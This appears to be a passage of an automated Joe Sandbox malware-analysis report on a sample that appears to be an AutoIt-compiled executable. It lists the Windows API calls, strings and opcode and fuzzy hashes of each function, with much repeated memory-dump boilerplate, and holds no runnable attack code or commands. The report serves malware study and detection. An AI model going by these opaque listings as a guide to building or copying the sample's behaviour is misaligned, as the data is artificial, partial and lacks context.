                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0090A163
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                • Opcode ID: 7227a02db1ae791c4cd63214783d5298b474233d1d7f8eea5665904c5b12250e
                                                                                                                • Instruction ID: e7ee27bb4e330ec55e690ca82111461a0019d98bdbf67bb1a6cc7f0ba5a1c6d7
                                                                                                                • Opcode Fuzzy Hash: 7227a02db1ae791c4cd63214783d5298b474233d1d7f8eea5665904c5b12250e
                                                                                                                • Instruction Fuzzy Hash: 47B0923106C208ABCA002B91FC19F883F68EB44BE2F404024F60D84260EBA25450AA91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ac1310a746eb06e38da294912879aeb00927b36f644cf287460113ae272c0257
                                                                                                                • Instruction ID: 600d563eb37784c5e561461947bb5815f177c4f7f34198b6ff07112df100b2e9
                                                                                                                • Opcode Fuzzy Hash: ac1310a746eb06e38da294912879aeb00927b36f644cf287460113ae272c0257
                                                                                                                • Instruction Fuzzy Hash: 1732CF22D29F414DD7239634D832336A249AFB73D4F25D737E82AB5EA6EB29C5C35100
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8e2b0314fbc0a545c96c30695cf4f5693666c87db38ec62a11b102f2589239a1
                                                                                                                • Instruction ID: b690d95efe7f288bb2e87004803a86e3a38b13a734ba4609545fadb083162995
                                                                                                                • Opcode Fuzzy Hash: 8e2b0314fbc0a545c96c30695cf4f5693666c87db38ec62a11b102f2589239a1
                                                                                                                • Instruction Fuzzy Hash: 90B1DF21E3AF414DD223AA39883533AB65CAFFB2D5B51D71BFC1A74D22EB2285C35141
                                                                                                                APIs
                                                                                                                • __time64.LIBCMT ref: 0094889B
                                                                                                                  • Part of subcall function 0090520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00948F6E,00000000,?,?,?,?,0094911F,00000000,?), ref: 00905213
                                                                                                                  • Part of subcall function 0090520A: __aulldiv.LIBCMT ref: 00905233
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                • String ID:
                                                                                                                • API String ID: 2893107130-0
                                                                                                                • Opcode ID: 60293b6e6ecfd0efdf249093da9bb2d0a9945a33ba6d644bcf828fa45f0926d7
                                                                                                                • Instruction ID: 336905572dabdf3967851ecc8be5e39516b6eb697aa7ff75b301cd881b52264a
                                                                                                                • Opcode Fuzzy Hash: 60293b6e6ecfd0efdf249093da9bb2d0a9945a33ba6d644bcf828fa45f0926d7
                                                                                                                • Instruction Fuzzy Hash: 0921B432A356108BC729CF29D841A52B3E5EFA5311B698E6CE1F5CB2C0CA34B905DB94
                                                                                                                APIs
                                                                                                                • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00944C4A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: mouse_event
                                                                                                                • String ID:
                                                                                                                • API String ID: 2434400541-0
                                                                                                                • Opcode ID: 93e86d91ae76ec93caee3f6daddf90d16df70b409774b3fa54b8a7a852e9bcbe
                                                                                                                • Instruction ID: 0bffb5f88280b283c047ac7a60b391c26def0fef5774b5b1c5c5894a3ed59af4
                                                                                                                • Opcode Fuzzy Hash: 93e86d91ae76ec93caee3f6daddf90d16df70b409774b3fa54b8a7a852e9bcbe
                                                                                                                • Instruction Fuzzy Hash: 53D05E9116960938FC2C07209E5FFFA010CE340783FD8854971828A0C2ECC49C406531
                                                                                                                APIs
                                                                                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00938389), ref: 009387D1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LogonUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 1244722697-0
                                                                                                                • Opcode ID: 5c3d42cac53ec1ee2a2fbc74fc8ee2e732ecb6b2f338daff6200943d88a617dd
                                                                                                                • Instruction ID: 866b1dff54cfc96755c4972d7a702aa0b34ea894449f5835f499f84e8cbccb31
                                                                                                                • Opcode Fuzzy Hash: 5c3d42cac53ec1ee2a2fbc74fc8ee2e732ecb6b2f338daff6200943d88a617dd
                                                                                                                • Instruction Fuzzy Hash: ABD09E3226450EBBEF019EA4ED05EAE3B69EB04B01F408511FE15D51A1C7B5D935AB60
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0090A12A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                • Opcode ID: 747fe8d81565a9e16da39036e28610ed26489d95d31dd52bb86a25669d2c7a52
                                                                                                                • Instruction ID: 443b745977ce589285fe2dde157bb0f70ff6a7907db03605941bf080961c676f
                                                                                                                • Opcode Fuzzy Hash: 747fe8d81565a9e16da39036e28610ed26489d95d31dd52bb86a25669d2c7a52
                                                                                                                • Instruction Fuzzy Hash: 83A0123001410CA78A001B41FC048447F5CD6002D07004020F40C40121977254105580
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e250a7594d6620819e2f46773d35a01c6fc9260a172b82ad93673478f683d543
                                                                                                                • Instruction ID: 9dd0b4e33ad9d7e2ebfdb01ab685e382cb1216aae597622f4aacee152b06a487
                                                                                                                • Opcode Fuzzy Hash: e250a7594d6620819e2f46773d35a01c6fc9260a172b82ad93673478f683d543
                                                                                                                • Instruction Fuzzy Hash: EE22433060852ECBDF388B78C4D427DBBA1FB05344F2A846BDA56CB592DB749D91CB42
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                • Instruction ID: 4ac62f98b17368c1b9db474500682c1f9e863edf87e3b2d9144e7fff4c630751
                                                                                                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                • Instruction Fuzzy Hash: 48C186332091930EDF2D4739847813EFBA55EA27B135A076EE8B3CB1D4EE24D965D620
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                • Instruction ID: e5f84b6301b47076cd8452612658be52729124bb06fe5d46b7168bcf707b21cb
                                                                                                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                • Instruction Fuzzy Hash: 38C186372051930DDF6D4739C43813EFAA55FA27B135A076ED4B2DB1D4EE20D925E620
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                • Instruction ID: d8e8f16af672836e2a96419a19e3af58667e1fc69bc4490cd242ae0f536056ee
                                                                                                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                • Instruction Fuzzy Hash: 4BC195332091930EDF6D463AC47413EFBA55EA27B135A076ED8B3DB1D4EE20C965E620
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                • Instruction ID: d12b3c616820001b9b953144b5927523c43d416d5daa59dcccd5da8cef777bfb
                                                                                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                • Instruction Fuzzy Hash: 15C181332091A30EDF2D463AC47413EFBA95EA27B135A176ED4B3DB1D4EE20C965D620
                                                                                                                APIs
                                                                                                                • DeleteObject.GDI32(00000000), ref: 0095785B
                                                                                                                • DeleteObject.GDI32(00000000), ref: 0095786D
                                                                                                                • DestroyWindow.USER32 ref: 0095787B
                                                                                                                • GetDesktopWindow.USER32 ref: 00957895
                                                                                                                • GetWindowRect.USER32(00000000), ref: 0095789C
                                                                                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 009579DD
                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 009579ED
                                                                                                                • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00957A35
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00957A41
                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00957A7B
                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00957A9D
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00957AB0
                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00957ABB
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00957AC4
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00957AD3
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00957ADC
                                                                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00957AE3
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00957AEE
                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00957B00
                                                                                                                • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00972CAC,00000000), ref: 00957B16
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00957B26
                                                                                                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00957B4C
                                                                                                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00957B6B
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00957B8D
                                                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00957D7A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                • API String ID: 2211948467-2373415609
                                                                                                                • Opcode ID: 85ae31a1512ea81ef119b79ec7e349fcf30fbbf179eb6c77b011f8b902886c64
                                                                                                                • Instruction ID: a748702a930d333c2ae096560a03eba3284b1be1246bd0d38b65cb67968b1d6a
                                                                                                                • Opcode Fuzzy Hash: 85ae31a1512ea81ef119b79ec7e349fcf30fbbf179eb6c77b011f8b902886c64
                                                                                                                • Instruction Fuzzy Hash: 86028B71914115AFDB14DFA9EC99EAEBBB9FF49310F008168F915AB2A0C7B09D01DB60
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?,0096F910), ref: 00963627
                                                                                                                • IsWindowVisible.USER32(?), ref: 0096364B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpperVisibleWindow
                                                                                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                • API String ID: 4105515805-45149045
                                                                                                                • Opcode ID: 3d1f7b381a354e47d45c80e00150bad5ddc043d31c8cac5ace681c6e40f86173
                                                                                                                • Instruction ID: eb3db28a1ebccad31268692b33aba31d81c9f31f68f92dec624921106d9a3d43
                                                                                                                • Opcode Fuzzy Hash: 3d1f7b381a354e47d45c80e00150bad5ddc043d31c8cac5ace681c6e40f86173
                                                                                                                • Instruction Fuzzy Hash: 91D17E702043419FCB14EF54C456B6E7BE5AF95354F148868F8869B3E2DB61DE0ACB42
                                                                                                                APIs
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0096A630
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0096A661
                                                                                                                • GetSysColor.USER32(0000000F), ref: 0096A66D
                                                                                                                • SetBkColor.GDI32(?,000000FF), ref: 0096A687
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0096A696
                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0096A6C1
                                                                                                                • GetSysColor.USER32(00000010), ref: 0096A6C9
                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 0096A6D0
                                                                                                                • FrameRect.USER32(?,?,00000000), ref: 0096A6DF
                                                                                                                • DeleteObject.GDI32(00000000), ref: 0096A6E6
                                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0096A731
                                                                                                                • FillRect.USER32(?,?,00000000), ref: 0096A763
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0096A78E
                                                                                                                  • Part of subcall function 0096A8CA: GetSysColor.USER32(00000012), ref: 0096A903
                                                                                                                  • Part of subcall function 0096A8CA: SetTextColor.GDI32(?,?), ref: 0096A907
                                                                                                                  • Part of subcall function 0096A8CA: GetSysColorBrush.USER32(0000000F), ref: 0096A91D
                                                                                                                  • Part of subcall function 0096A8CA: GetSysColor.USER32(0000000F), ref: 0096A928
                                                                                                                  • Part of subcall function 0096A8CA: GetSysColor.USER32(00000011), ref: 0096A945
                                                                                                                  • Part of subcall function 0096A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0096A953
                                                                                                                  • Part of subcall function 0096A8CA: SelectObject.GDI32(?,00000000), ref: 0096A964
                                                                                                                  • Part of subcall function 0096A8CA: SetBkColor.GDI32(?,00000000), ref: 0096A96D
                                                                                                                  • Part of subcall function 0096A8CA: SelectObject.GDI32(?,?), ref: 0096A97A
                                                                                                                  • Part of subcall function 0096A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0096A999
                                                                                                                  • Part of subcall function 0096A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0096A9B0
                                                                                                                  • Part of subcall function 0096A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0096A9C5
                                                                                                                  • Part of subcall function 0096A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0096A9ED
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                • String ID:
                                                                                                                • API String ID: 3521893082-0
                                                                                                                • Opcode ID: 308c2063436d805461e1b766424befc730c579d005fb94d3daaa20dd55a87f86
                                                                                                                • Instruction ID: 04b6a63b3daa04dd09b64f0e5351eee176953cbe7b6ea3e253b2046968dab33a
                                                                                                                • Opcode Fuzzy Hash: 308c2063436d805461e1b766424befc730c579d005fb94d3daaa20dd55a87f86
                                                                                                                • Instruction Fuzzy Hash: 97917F7241C301EFCB109F64EC08A6B7BA9FF89321F104A2DF562A61A1D7B5D944EF52
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(00000000), ref: 009574DE
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0095759D
                                                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 009575DB
                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 009575ED
                                                                                                                • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00957633
